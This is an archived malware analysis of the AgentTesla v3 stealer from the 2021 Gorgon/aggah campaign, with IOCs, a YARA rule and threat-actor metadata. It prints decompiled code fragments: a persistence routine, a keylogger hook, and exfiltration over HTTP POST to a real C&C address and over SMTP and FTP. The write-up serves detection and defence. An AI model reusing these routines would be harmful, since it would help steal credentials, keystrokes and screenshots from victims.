{ "id": "dd14bd1f-ed22-4709-82d0-902925651417", "created_at": "2026-04-06T01:32:19.644857Z", "updated_at": "2026-04-10T03:35:56.588146Z", "deleted_at": null, "sha1_hash": "a104e67e37dc5816f9dfeccb882d328c0551b2e7", "title": "Malware Analysis - AgentTesla v3", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 978938, "plain_text": "Malware Analysis - AgentTesla v3\r\nPublished: 2022-01-12 · Archived: 2026-04-06 01:14:04 UTC\r\nMD5: a943bea8997dec969ba9cff3286ef6e2\r\nOriginalFileName: “NkDnTaDBWeMjVScdRKFYjpoobAxnO.exe”\r\nCompilation Timestamp: “10/16/2021 4:35:13 AM”\r\nThis article is the last part of a post about the 2021 “aggah” campaign linked to the Gorgon APT Group. Part 1,\r\nrelated to the campaign details can be found here.\r\nThe sample, the scripts made during the analysis and the related YARA rules can be download from here.\r\nSummary\r\nTL;DR\r\nFirst overview\r\nProtection and Evasion mechanisms\r\nCode Obfuscation\r\nString Obfuscation\r\nDelayed execution\r\nMutex Equivalent\r\nIDLE Detection\r\nArbitrary Execution Prevention\r\nPersistence\r\nCopy on Disk\r\nSurviving a Reboot\r\nC\u0026C Communication\r\nC\u0026C Verification\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 1 of 18\n\nPeriodic Beacon\r\nUninstallation Order\r\nStealing Capabilities\r\nPeriodic Screenshot\r\nBrowser Cookies and Passwords Harvesting\r\nKeylogger\r\nBasic Computer Configuration\r\nAlternative Communication Mechanisms\r\nExfiltration through Mail\r\nExfiltration through FTP\r\nC\u0026C communication code summary\r\nIndicators of compromise\r\nTL;DR\r\nAgentTesla v3 is a stealer focused on harvesting browser credentials and cookies of the infected host.\r\nIt has different features such as monitoring the clipboard of the user, keylogging and taking periodic screenshots.\r\nIts persistence mechanism is done through the “Run” registry key.\r\nIt contains multiple exfiltraction channels that goes from HTTP post requests, to mail or FTP exfiltration.\r\nThe malware is not evasive, but contains some obfuscation mechanisms to make the analysis more time\r\nconsuming.\r\nFirst overview:\r\nThis file is written is .Net, which is going to help us reversing it quicker.\r\nFrom the Detect It Easy (DIE) output, the binary seems obfuscated using “Obfuscar 1.0”: An open-source .Net\r\nobfuscator.\r\nThe entropy level of the binary is high, but not enough to affirme that this is packed or that it contains an\r\nembedded packed payload.\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 2 of 18\n\nFrom the analysis of the infection chain (part1), this binary seems to be the final payload of the infection chain.\r\nProtection and Evasion mechanisms\r\nThis sample is not actively evasive nor will try to fingerprint any analysis environment but it still uses some small\r\ntechniques from time to time by the malware author.\r\nCode Obfuscation\r\nThe code obfuscation mechanism used by the malware author is simple but efficient: it renames each methods,\r\nfunctions and variables used in the code with random letters.\r\nHere is an exemple of a obfuscated snipet:\r\nprivate static void a(object A_0, ElapsedEventArgs A_1)\r\n{\r\nglobal::A.b.A.A = Marshal.SizeOf(global::A.b.A);\r\nglobal::A.b.A.a = 0;\r\nglobal::A.b.A(ref global::A.b.A);\r\nif (checked((int)Math.Round((double)(Environment.TickCount - global::A.b.A.a) / 1000.0)) \u003e 600)\r\n{\r\n global::A.b.A = false;\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 3 of 18\n\n}\r\nelse\r\n{\r\nglobal::A.b.A = true;\r\n}\r\n}\r\nAnd it’s manually de-obfuscated version:\r\nprivate static void DetectIDLEComputer(object A_0, ElapsedEventArgs A_1)\r\n{\r\nMainMethod.LASTINPUTINFO.cbSize = Marshal.SizeOf(MainMethod.LASTINPUTINFO);\r\nMainMethod.LASTINPUTINFO.dwTime = 0;\r\nMainMethod.GetLastInputInfo_api(ref MainMethod.LASTINPUTINFO);\r\nif (checked((int)Math.Round((double)(Environment.TickCount - MainMethod.LASTINPUTINFO.dwTime) / 1000.0)\r\n{\r\nMainMethod.IsIDLE = false;\r\n}\r\nelse\r\n{\r\nMainMethod.IsIDLE = true;\r\n}\r\n}\r\nThis made the analysis a bit more time consuming, as each default variable/function/method names overlaps with\r\nthe name of each others.\r\nString Obfuscation\r\nWhen looking at the cross references for a string, we can spot that each string is decrypted at runtime before being\r\nused:\r\npublic static string \"KL\"() {\r\n return EncStrings.\u003c\u003cEMPTY_NAME\u003e\u003e[56] ?? EncStrings.\u003c\u003cEMPTY_NAME\u003e\u003e(319, 4639, 25);\r\n}\r\nThe string encryption mechanism is easy to deal with, the string are simply stored in a xored byte array\r\n“«EMPTY_NAME»”.\r\nstatic EncStrings() {\r\n EncStrings.\u003c\u003cEMPTY_NAME\u003e\u003e = new byte[] {\r\n156, 155, 209, 208, 215, 214, 129, 224, 239, 142, 196, 197, 134, 239, 236, 159, [...]\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 4 of 18\n\n}\r\n}\r\nAnd the xor routine can be simplified to:\r\nfor (int i = 0; i \u003c EncStrings.\u003c\u003cEMPTY_NAME\u003e\u003e.Length; i++) {\r\n EncStrings.\u003c\u003cEMPTY_NAME\u003e\u003e[i] = (EncStrings.\u003c\u003cEMPTY_NAME\u003e\u003e[i] ^ i ^ 170);\r\n}\r\nThe trick here is that the strings are concatenated with each other and referenced with a unique offset, making it\r\ntime consuming to map each decipher string with its variable.\r\nThe following python script can be used to retrieved the plaintext value of the strings:\r\nimport sys\r\nplain = ''\r\nvalues = extracted_byte_array\r\nfor x in range(0, len(values)):\r\n values[x] = (values[x] ^ x ^ 170) \u0026 0xff\r\nfor elem in values:\r\n plain += chr(elem)\r\nstart = int(sys.argv[1])\r\nsize = int(sys.argv[2])\r\nprint('\"' + plain[start:start+size] + '\"')\r\nIn order to use this script, the offset of the target string and its length must have been identified from the cipher\r\nstring declaration.\r\nFor the example shown just before, with an offset of 4639 and a length of 25, the cleartext would be:\r\n[user@arch mana]# python3 string_decrypt.py 4639 25\r\n\"\\Google\\Chrome\\User Data\\\"\r\nDelayed execution\r\nBefore starting, I must emphasize that this malware uses a lot of delaying techniques.\r\nIn between every major steps, an arbitrary sleep is called.\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 5 of 18\n\nThis would render the detonation of the sample in a sandbox almost useless, as the allocated analysis time would\r\nbe shorter than the amount of sleep performed.\r\nAnother technique used by the malware author is to use of some timer objects to periodically execute a function:\r\nSystem.Timers.Timer timer = new System.Timers.Timer();\r\ntimer.Elapsed += My.Function;\r\ntimer.Enabled = true;\r\ntimer.Interval = 30000.0;\r\ntimer.Start();\r\nThis example will launch “My.Function()” every 30 seconds.\r\nA lot of background tasks are executed that way in this sample, as an alternative method of spawning new threads.\r\nMutex Equivalent\r\nWhen started, the malware will terminate every other process that share its name.\r\nThis ensure that the binary is the only instance running on the infected system.\r\nThis method seems a bit rough, but has the benefit of not leaving any mutex IOCs for the analyst.\r\nstring ownProcessName = Process.GetCurrentProcess().ProcessName;\r\nint current_pid = Process.GetCurrentProcess().Id;\r\nProcess[] processesByName = Process.GetProcessesByName(ownProcessName);\r\nforeach (Process process in processesByName) {\r\n if (process.Id != current_pid) {\r\nprocess.Kill();\r\n}\r\n}\r\nIDLE Detection\r\nAs explained in the “Delayed Execution” section, this detection method instantiate a timer object in order to\r\nexecute a function every 30 seconds. This first timer will detect if some activity is performed on the infected\r\ncomputer, or if the system is IDLE.\r\nMainMethod.LASTINPUTINFO.cbSize = Marshal.SizeOf(MainMethod.LASTINPUTINFO);\r\nMainMethod.LASTINPUTINFO.dwTime = 0;\r\nMainMethod.GetLastInputInfo_api(ref MainMethod.LASTINPUTINFO);\r\nif (checked((int)Math.Round((double)(Environment.TickCount - MainMethod.LASTINPUTINFO.dwTime) / 1000.0)) \u003e 600)\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 6 of 18\n\n{\r\n MainMethod.IsIDLE = true;\r\n} else {\r\nMainMethod.IsIDLE = false;\r\n}\r\nThe global variable “IsIDLE” will be used later to determine if a screenshot should be taken.\r\nArbitrary Execution Prevention\r\nAnother cool check performed by this sample is the detection of its execution path.\r\nA simple comparison is made between the path embedded in its configuration and the program starting location.\r\nThis can serve two purposes:\r\nFirst, it can indicate to the malware that it is its first execution (so it needs to setup some persistence procedure for\r\ninstance).\r\nBut as a side effect, this will also prevent the dynamic analysis of the sample, as the execution from an arbitrary\r\nlocation will not result in any major malicious behaviour.\r\nA simple sandbox detonation will not result in any trigger of the malware core functionnalities without a reboot of\r\nthe sandbox environment.\r\nMainMethod.DynamicExecutionPath = Assembly.GetExecutingAssembly().Location;\r\nMainMethod.ExpectedExecutionPath = Environment.GetEnvironmentVariable(EncStrings.\"%startupfolder%\"()) + EncStrin\r\nif (Operators.CompareString(MainMethod.DynamicExecutionPath, MainMethod.ExpectedExecutionPath, false) != 0) {\r\n // Do persistence\r\n} else {\r\n // Do malicious stuff\r\n}\r\nPersistence\r\nLike every malware that must persist in time, this sample ensure that it will not be deleted after a simple reboot or\r\na process termination.\r\nCopy on Disk\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 7 of 18\n\nBased on the previous technique, the malware will only perform the persistence steps if it detects that it is its first\r\nrun on the infected computer.\r\nFirst, it will create the directory where it need to replicate itself (taken from it’s configuration).\r\nIf this specific path already exist, it will try to search for running programs launched from this path, and terminate\r\nthem.\r\nThis allows the malware to kill other instance of itself, even if it was renamed.\r\nNext, it will copy itself in the said location.\r\nThe file attributes of the copy are set to “Hidden” and “System”, in order to blend into the computer.\r\nFinally, the zone identifier file associated with the malware is deleted.\r\nThe zone identifiers usually contains metadata about downloaded files and may betray the malicious aspect of the\r\nmalware.\r\nSurviving a Reboot\r\nTo survive a reboot, the “Run” registry key is modified to insert the path to the on-disk copy of the malware.\r\nThis registry key specify the list of the programs to launch when the OS is started.\r\nNothing unusual here, almost the same exact code as a plethora of other malwares:\r\nRegistryKey registryKey = Registry.CurrentUser.OpenSubKey(EncStrings.\"Software\\Microsoft\\Windows\\CurrentVersion\r\nregistryKey.SetValue(EncStrings.\"%insregname%\"(), MainMethod.File);\r\nRegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey(EncStrings.\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\r\nif (registryKey2 != null) {\r\nbyte[] value = new byte[] { 2,0,0,0,0,0,0,0,0,0,0,0 };\r\nregistryKey2.SetValue(EncStrings.\"%insregname%\"(), value);\r\nC\u0026C Communication\r\nThis malware can use various communication methods to exfiltrate and receive data from the C\u0026C server.\r\nThe details of each communication mechanism will be made later in this blog post.\r\nThis section assume that the communication method is set to “0”, which indicate a HTTP 1-to-1 communication\r\nwith the C\u0026C server.\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 8 of 18\n\nC\u0026C Verification\r\nBefore doing anything suspicious, the malware test its connection with the C\u0026C, making sure that it is still up and\r\nreachable.\r\nA set of multiples malware states can be sent back to the C\u0026C sever.\r\nThe order “0” indicates that the current request is the first one coming from an infected computer.\r\nThe hardcoded string “b3ed3525f97cee0113489937f7b48ece8c7b4b535fd2664da33e3251a78a9c21” is sent to the\r\nC\u0026C (maybe as a campaign ID), along with the username of the infected computer and the request send-off\r\ntimestamp.\r\nThose key/value infos are then encrypted using 3DES (CBC Mode) before beeing encoded in base64.\r\nFinally, the request is sent, to the specific endpoint:\r\n“http[:]//103.125.190.248/j/p11l/mawa/0b5eace2c983ebeba55b[.]php”, using an HTTP POST request:\r\nhttp_param = EncStrings.\"p=\"() + 3DESModule.3DES_base64_encode(first_beacon);\r\nstring requestUriString = EncStrings.\"http://103_125_190_248/j/p11l/mawa/0b5eace2c983ebeba55b.php\"();\r\nHttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(requestUriString);\r\nhttpWebRequest.KeepAlive = true;\r\nhttpWebRequest.Timeout = 10000;\r\nhttpWebRequest.AllowAutoRedirect = true;\r\nhttpWebRequest.MaximumAutomaticRedirections = 50;\r\nhttpWebRequest.UserAgent = EncStrings.user_agent();\r\nhttpWebRequest.Method = EncStrings.\"POST\"();\r\nhttp_param = http_param.Replace(EncStrings.\"+\"(), EncStrings.\"%2B\"());\r\nbyte[] bytes = Encoding.UTF8.GetBytes(http_param);\r\nhttpWebRequest.ContentType = EncStrings.\"application/x-www-form-urlencoded\"();\r\nhttpWebRequest.ContentLength = (long)bytes.Length;\r\nThe hardcoded user-agent used by this sample to perform the request is: “Mozilla/5.0 (Windows NT 10.0; Win64;\r\nx64; rv:80.0) Gecko/20100101 Firefox/80.0”.\r\nIf the request reaches the C\u0026C server properly, the malware can carry on.\r\nPeriodic Beacon\r\nWith another timer object, the malware will send a periodic beacon to the C\u0026C every 60 seconds, to indicate that\r\nit’s still alive.\r\nThis beacon request is the exact same as the one previously described, but this time, the order code used is “1”.\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 9 of 18\n\nSystem.Timers.Timer timer2 = new System.Timers.Timer();\r\ntimer2.Elapsed += MainMethod.SendPeriodicBeacon;\r\ntimer2.Interval = 120000.0;\r\ntimer2.Enabled = true;\r\nUninstallation Order\r\nThis one is a bit weird.\r\nA second timer object is instantiated, but this time, it will specificaly listen for an uninstallation order.\r\nThe order “2” is sent to the C\u0026C server (same HTTP POST request than before).\r\nIf the string “uninstall” is found in the body of the response to this request, the malware will remove its\r\npersistence mechanism, delete its on-disk copy before killing itself:\r\nstring text = MainMethod.SendCCRequest(2, EncStrings.None()); // Function simplified for clarity\r\nif (text.Contains(EncStrings.\"uninstall\"())) {\r\n Registry.CurrentUser.OpenSubKey(EncStrings.\"Software\\Microsoft\\Windows_NT\\CurrentVersion\\Windows\"(), true).D\r\n Registry.CurrentUser.OpenSubKey(EncStrings.\"Software\\Microsoft\\Windows\\CurrentVersion\\Run\"(), true).DeleteVa\r\nSystem.IO.File.Delete(MainMethod.File);\r\nApplication.Exit();\r\n}\r\nSeems a bit weird to dedicate a single “thread” (the timer object is basically used as a way to spawn new\r\nmalware’s thread) for that specific thing …\r\nStealing Capabilities\r\nThis malware is focused on stealing sensitive data from the infected computer, so this section will unveil the core\r\nof the malware.\r\nPeriodic Screenshot\r\nOnce again, another timer object is setup in order to take a screenshot of the infected computer every hour.\r\nThe attentive reader will remember that the “IDLE detection” timer (explained at the beginning of this post) will\r\ndetermine whether or not a screenshot must be taken.\r\nWithout any user activity, the hourly screenshot will be skipped.\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 10 of 18\n\nThe screenshot is taken in the .jpeg format.\r\nThe same thread is responsible for the exfiltration of the screenshot.\r\nThe C\u0026C order “4” indicate that the content of the HTTP parameter is a screenshot.\r\nThe request follows the same method (3DES + base64 encoding) that the periodic beacon thread and the “init”\r\nC\u0026C request.\r\nSystem.Drawing.Imaging.Encoder quality = System.Drawing.Imaging.Encoder.Quality;\r\nImageCodecInfo encoder = MainMethod.A(ImageFormat.Jpeg);\r\nEncoderParameter encoderParameter = new EncoderParameter(quality, 50L);\r\nencoderParameters.Param[0] = encoderParameter;\r\nGraphics graphics = Graphics.FromImage(bitmap);\r\nGraphics graphics2 = graphics;\r\nPoint point = new Point(0, 0);\r\nPoint upperLeftSource = point;\r\nPoint upperLeftDestination = new Point(0, 0);\r\ngraphics2.CopyFromScreen(upperLeftSource, upperLeftDestination, blockRegionSize);\r\nMemoryStream memoryStream = new MemoryStream();\r\nbitmap.Save(memoryStream, encoder, encoderParameters);\r\nmemoryStream.Position = 0L;\r\nif (!MainMethod.IsIDLE) {\r\nMainMethod.SendCCRequest(4, Convert.ToBase64String(memoryStream.ToArray()));\r\n}\r\nHere is an exemple of what is send to the C\u0026C server:\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 11 of 18\n\nBrowser Cookies and Passwords Harvesting\r\nThe stealer module is straight forward, as it will only search for some well-known software (Browser, FTP client,\r\nMail client, VPN) to try to grab the related credentials.\r\nMost of the time, the malware will search for a specific file related to the targeted software and take its content.\r\nSome regex functions are also embedded, in order to easily search for some “login” and “passwords” strings in\r\nfiles.\r\nSometimes the malware goes straigth registry hive to get more infos.\r\nNothing fancy here, just the malware doing its thing.\r\nThe complete list of targeted software is available bellow:\r\nBrowsers:\r\nEmail clients:\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 12 of 18\n\nFTP clients:\r\nMISC:\r\nWhen done harvesting, the stolen material is sent back as a ZIP file to the C\u0026C server.\r\nThe ZIP layout is the following:\r\nArchive: 2077625985616e513aab1a180052858416346197067008.zip\r\n inflating: pqwtptkf.etq/Chrome/Default/Cookies\r\n inflating: pqwtptkf.etq/Chrome/Guest Profile/Cookies\r\n inflating: pqwtptkf.etq/Chrome/Profile 1/Cookies\r\n inflating: pqwtptkf.etq/Chrome/System Profile/Cookies\r\n inflating: pqwtptkf.etq/Firefox/Profiles/50pdb514.default-1602661058701/cookies.sqlite\r\nKeylogger\r\nAnother timer object is instantiated to setup a periodic exfiltration function for the keylogger.\r\nThis function will monitor the “%TEMP%/tmp.log” file, wich contains the saved keystrokes, and send the content\r\nback to the C\u0026C (order code “3”).\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 13 of 18\n\nstring path = Path.GetTempPath() + EncStrings.\"/log.tmp\"();\r\nstring strKeyState = MainMethod.StrKeyState;\r\nlock (strKeyState) {\r\n text += MainMethod.StrKeyState;\r\n MainMethod.StrKeyState = string.Empty;\r\n}\r\ntry {\r\n if (MainMethod.ExfiltrationMethod == 0) {\r\n if (System.IO.File.Exists(path)) {\r\n MainMethod.SendCCRequest(3, Uri.EscapeDataString(System.IO.File.ReadAllText(path)));\r\n System.IO.File.Delete(path);\r\n }\r\n }\r\n}\r\nThe keylogger works by placing a simple hook on keyboard callback procedure that act as a proxy, converting\r\neach keystroke code to its ASCII code.\r\n[...]\r\nelse if (global::A.B.Computer.Keyboard.AltKeyDown \u0026 A_0 == Keys.F4) {\r\n MainMethod.StrKeyState += EncStrings.\"\u003cfont_color=\"#00ba66\"\u003e{ALT+F4}\u003c/font\u003e\"();\r\n}\r\nelse if (A_0 == Keys.Tab) {\r\n MainMethod.StrKeyState += EncStrings.\"\u003cfont_color=\"#00ba66\"\u003e{TAB}\u003c/font\u003e\"();\r\n}\r\nelse if (A_0 == Keys.Escape) {\r\n MainMethod.StrKeyState += EncStrings.\"\u003cfont_color=\"#00ba66\"\u003e{ESC}\u003c/font\u003e\"();\r\n}\r\nelse if (A_0 == Keys.LWin | A_0 == Keys.RWin) {\r\n MainMethod.StrKeyState += EncStrings.\"\u003cfont_color=\"#00ba66\"\u003e{Win}\u003c/font\u003e\"();\r\n}\r\nThe name of the active window is also gathered to add some context.\r\nThe data is saved as a html file, before beeing sent back to the C\u0026C server.\r\nBasic Computer Configuration\r\nWhile keystrokes and the screenshots are processed before beeing exfiltrated, some the computer configuration is\r\nalso retrieved.\r\nMultiple informations are gathered by the malware:\r\nThe OS Full Name\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 14 of 18\n\nThe amount of RAM and the processor specification (WMI request “SELECT*FROM_Win32_Processor”)\r\nThe IP address of the computer\r\nThe username\r\nThe computer name\r\nThe timestamp of the operation\r\nThese are also sent back to the C\u0026C server (order code “3”):\r\nMainMethod.SendCCRequest(3, Uri.EscapeDataString(MainMethod.FingerprintComputerInfos() + text));\r\nAlternative Communication Mechanisms\r\nBased on a global variable taken from the configuration file of the malware, the exfiltration method can use some\r\nalternatives communication mechanisms.\r\nExfiltration through Mail\r\nIf the related configuration variable is set to “1”, the malware will send the stolen data by mail to the botmaster:\r\nif (MainMethod.ExfiltrationMethod == 1) {\r\n if (System.IO.File.Exists(path)) {\r\n MainMethod.ExfiltrateThroughMail(MainMethod.GenerateMailSubject(EncStrings.\"KL\"()), MainMethod.Finge\r\n System.IO.File.Delete(path);\r\n}\r\nMainMethod.ExfiltrateThroughMail(MainMethod.GenerateMailSubject(EncStrings.\"KL\"()), MainMethod.Fingerpr\r\n}\r\nA two letter identifier is used to indicate what type of file is sent by mail:\r\n“KL” : keylogger data\r\n“SC” : periodic screenshot\r\n“PW” : stolen passwords\r\n“CO” : stolen cookies\r\nThe subject of the mail is created from the configuration of the computer (see “Basic Computer Configuration”\r\nchapter).\r\nSmtpClient smtpClient = new SmtpClient();\r\nNetworkCredential credentials = new NetworkCredential(EncStrings.\"%mailaddres%\"(), EncStrings.\"%password%\"());\r\nsmtpClient.Host = EncStrings.\"%smtp%\"();\r\nsmtpClient.EnableSsl = true;\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 15 of 18\n\nsmtpClient.UseDefaultCredentials = false;\r\nsmtpClient.Credentials = credentials;\r\nsmtpClient.Port = 587;\r\nMailAddress to = new MailAddress(EncStrings.\"%toemail%\"());\r\nMailAddress from = new MailAddress(EncStrings.\"%mailaddres%\"());\r\nMailMessage mailMessage = new MailMessage(from, to);\r\nmailMessage.Subject = A_0;\r\nThe values “%mailaddres%”, “%password%”, “%toemail%”, “%smtp%” and “%mailaddres%” are taken from\r\nthe configuration file.\r\nWhen this method of exfiltration is used, the infos are passed as an attachment:\r\nif (data != null \u0026 data_type == 1) {\r\n mailMessage.Attachments.Add(new Attachment(data_type, data + EncStrings.\"_\"() + DateTime.Now.ToString(MainMeth\r\n}\r\nelse if (data != null \u0026 data_type == 2) {\r\n mailMessage.Attachments.Add(new Attachment(data_type, data + EncStrings.\"_\"() + DateTime.Now.ToString(MainMeth\r\n}\r\nsmtpClient.Send(mailMessage);\r\nExfiltration through FTP\r\nIf the related configuration variable is set to “2”, the malware will exfiltrate the data to a FTP server controled by\r\nthe attacker.\r\nThe same two-letter codes than the mail exfiltration method is applied to the filename of what’s getting exfiltrated.\r\nThe exfiltration routine is the following:\r\nFtpWebRequest ftpWebRequest = (FtpWebRequest)WebRequest.Create(EncStrings.\"%ftphost%/\"() + endpoint);\r\nftpWebRequest.Credentials = new NetworkCredential(EncStrings.\"%ftpuser%\"(), EncStrings.\"%ftppassword%\"());\r\nftpWebRequest.Method = EncStrings.\"STOR\"();\r\nStream requestStream = ftpWebRequest.GetRequestStream();\r\nrequestStream.Write(data, 0, data.Length);\r\nrequestStream.Close();\r\nrequestStream.Dispose();\r\nThe “%ftphost%”, “%ftpuser%” and “%ftppassword%” variables are defined in the configuration of the malware.\r\nC\u0026C communication code summary\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 16 of 18\n\nHere is a quick summary of the different malware code used by the C\u0026C server:\r\nExfiltration method:\r\n“0”: HTTP\r\n“1”: Mail\r\n“2”: FTP\r\nC\u0026C Order:\r\n“0”: Communication test\r\n“1”: Keep-Alive Beacon\r\n“2”: Uninstall Beacon\r\n“3”: Keylogger data\r\n“4”: Screenshot data\r\n“5”: Stealer data (passwords, cookies, etc…)\r\nIOCs\r\nHash:\r\nMD5: a943bea8997dec969ba9cff3286ef6e2\r\nSHA256: 08ea74c1335c6a03b1d5167d7f5a6f45c6b6338c82ce7074a0879b38ca4851d8\r\nRegistryKey:\r\n“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run”\r\n“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run”\r\nUser-Agent:\r\n“Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0”\r\nC\u0026C:\r\nPanel: “http[:]//103.125.190.248/j/p11l/login[.]php”\r\nGate: “http[:]//103.125.190.248/j/p11l/mawa/0b5eace2c983ebeba55b[.]php”\r\ncampaign ID: “b3ed3525f97cee0113489937f7b48ece8c7b4b535fd2664da33e3251a78a9c21”\r\nYARA Rule:\r\nrule AgentTesla_Mana_Campaign {\r\n meta:\r\n author = \"HomardBoy\"\r\n description = \"AgentTesla version 3 linked to the 2021 Gorgon group APT campaign\"\r\n strings:\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 17 of 18\n\n$str1 = \"get_enableLog\" ascii\r\n $str2 = \"get_Browser\" ascii\r\n $str3 = \"get_kbok\" ascii\r\n $str4 = \"get_Ctrl\" ascii\r\n $str5 = \"get_Shift\" ascii\r\n $str6 = \"get_Alt\" ascii\r\n $str7 = \"get_CHoo\" ascii\r\n $str8 = \"tor\" ascii\r\n$str9 = \"mscoree.dll\" ascii\r\n condition:\r\n (uint16(0) == 0x5a4d and all of ($str*))\r\n}\r\nSource: https://guillaumeorlando.github.io/AgentTesla\r\nhttps://guillaumeorlando.github.io/AgentTesla\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://guillaumeorlando.github.io/AgentTesla" ], "report_names": [ "AgentTesla" ], "threat_actors": [ { "id": "414d7c65-5872-4e56-8a7d-49a2aeef1632", "created_at": "2025-08-07T02:03:24.7983Z", "updated_at": "2026-04-10T02:00:03.76109Z", "deleted_at": null, "main_name": "COPPER FIELDSTONE", "aliases": [ "APT36 ", "Earth Karkaddan ", "Gorgon Group ", "Green Havildar ", "Mythic Leopard ", "Operation C-Major ", "Operation Transparent Tribe ", "Pasty Draco ", "ProjectM ", "Storm-0156 " ], "source_name": "Secureworks:COPPER FIELDSTONE", "tools": [ "CapraRAT", "Crimson RAT", "DarkComet", "ElizaRAT", "LuminosityLink", "ObliqueRAT", "Peppy", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "b0d34dd6-ee90-483b-bb6c-441332274160", "created_at": "2022-10-25T16:07:23.296754Z", "updated_at": "2026-04-10T02:00:04.526403Z", "deleted_at": null, "main_name": "Aggah", "aliases": [ "Operation Red Deer", "Operation Roma225" ], "source_name": "ETDA:Aggah", "tools": [ "AgenTesla", "Agent Tesla", "AgentTesla", "Aggah", "Atros2.CKPN", "Bladabindi", "Jorik", "Nancrat", "NanoCore", "NanoCore RAT", "Negasteal", "Origin Logger", "Revenge RAT", "RevengeRAT", "Revetrat", "Warzone", "Warzone RAT", "ZPAQ", "Zurten", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "18278778-fa63-4a9a-8988-4d266b8c5c1a", "created_at": "2023-01-06T13:46:38.769816Z", "updated_at": "2026-04-10T02:00:03.094179Z", "deleted_at": null, "main_name": "The Gorgon Group", "aliases": [ "Gorgon Group", "Subaat", "ATK92", "G0078", "Pasty Gemini" ], "source_name": "MISPGALAXY:The Gorgon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "97fdaf9f-cae1-4ccc-abe2-76e5cbc0febd", "created_at": "2022-10-25T15:50:23.296989Z", "updated_at": "2026-04-10T02:00:05.347085Z", "deleted_at": null, "main_name": "Gorgon Group", "aliases": [ "Gorgon Group" ], "source_name": "MITRE:Gorgon Group", "tools": [ "NanoCore", "QuasarRAT", "Remcos", "njRAT" ], "source_id": "MITRE", "reports": null }, { "id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2", "created_at": "2023-06-20T02:02:10.254614Z", "updated_at": "2026-04-10T02:00:03.365336Z", "deleted_at": null, "main_name": "Hagga", "aliases": [ "TH-157", "Aggah" ], "source_name": "MISPGALAXY:Hagga", "tools": [ "Agent Tesla" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "6c4e4b91-1f98-49e2-90e6-435cea8d3d53", "created_at": "2022-10-25T16:07:23.693797Z", "updated_at": "2026-04-10T02:00:04.711987Z", "deleted_at": null, "main_name": "Gorgon Group", "aliases": [ "ATK 92", "G0078", "Pasty Draco", "Subaat", "TAG-CR5" ], "source_name": "ETDA:Gorgon Group", "tools": [ "AgenTesla", "Agent Tesla", "AgentTesla", "Atros2.CKPN", "Bladabindi", "CinaRAT", "Crimson RAT", "ForeIT", "Jorik", "LOLBAS", "LOLBins", "Living off the Land", "Loki", "Loki.Rat", "LokiBot", "LokiPWS", "MSIL", "MSIL/Crimson", "Nancrat", "NanoCore", "NanoCore RAT", "Negasteal", "NetWeird", "NetWire", "NetWire RAT", "NetWire RC", "NetWired RC", "Origin Logger", "Quasar RAT", "QuasarRAT", "Recam", "Remcos", "RemcosRAT", "Remvio", "Revenge RAT", "RevengeRAT", "Revetrat", "SEEDOOR", "Scarimson", "Socmer", "Yggdrasil", "ZPAQ", "Zurten", "njRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775439139, "ts_updated_at": 1775792156, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a104e67e37dc5816f9dfeccb882d328c0551b2e7.pdf", "text": "https://archive.orkl.eu/a104e67e37dc5816f9dfeccb882d328c0551b2e7.txt", "img": "https://archive.orkl.eu/a104e67e37dc5816f9dfeccb882d328c0551b2e7.jpg" } }